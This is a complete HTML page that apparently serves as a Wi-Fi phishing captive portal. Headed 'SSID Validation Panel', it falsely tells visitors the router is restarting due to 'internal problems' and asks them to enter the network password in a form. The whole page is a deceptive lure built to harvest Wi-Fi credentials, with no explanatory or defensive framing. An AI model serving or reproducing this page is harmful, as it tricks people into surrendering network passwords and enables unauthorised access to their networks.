<!DOCTYPE html>
<html>
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        article { background: #f2f2f2; padding: 1.3em; }
        body { color: #333; font-family: Century Gothic, sans-serif; font-size: 18px; line-height: 24px; margin: 0; padding: 0; }
        div { padding: 0.5em; }
        h1 { margin: 0.5em 0 0 0; padding: 0.5em; }
        input { width: 100%; padding: 9px 10px; margin: 8px 0; box-sizing: border-box; border-radius: 0; border: 1px solid #555555; }
        label { color: #333; display: block; font-style: italic; font-weight: bold; }
        nav { background: #0066ff; color: #fff; display: block; font-size: 1.3em; padding: 1em; }
        nav b { display: block; font-size: 1.5em; margin-bottom: 0.5em; }
        textarea { width: 100%; }
        body {
            background: #1a1a1a;
            color: #bfbfbf;
            font-family: sans-serif;
            margin: 0;
        }
        .content { max-width: 800px; margin: auto; }
        table { border-collapse: collapse; }
        th, td {
            padding: 10px 6px;
            text-align: left;
            border-style: solid;
            border-color: orange;
        }
        button {
            display: inline-block;
            height: 38px;
            padding: 0 20px;
            color: #fff;
            text-align: center;
            font-size: 11px;
            font-weight: 600;
            line-height: 38px;
            letter-spacing: .1rem;
            text-transform: uppercase;
            text-decoration: none;
            white-space: nowrap;
            background: #2f3136;
            border-radius: 4px;
            border: none;
            cursor: pointer;
            box-sizing: border-box;
        }
        button:hover {
            background: #42444a;
        }
        h1 {
            font-size: 1.7rem;
            margin-top: 1rem;
            background: #2f3136;
            color: #bfbfbb;
            padding: 0.2em 1em;
            border-radius: 3px;
            border-left: solid #20c20e 5px;
            font-weight: 100;
        }
    </style>
</head>
<body>
    <nav><b>SSID</b> Validation Panel</nav>
    <div>
        <h1>Sign in:</h1>
        <p>Due to internal problems router is being restarted. Enter password to re-connect to the network.</p>
        <form action='/'>
            <b>Password:</b> <center>
            <input type="password" name="password"></input>
            <input type="submit" value="Sign in"></form></center>
        </div>
        <div>
            <footer>
                <a>&#169; All rights reserved.</a>
            </footer>
        </div>
    </div>
</body>
</html>
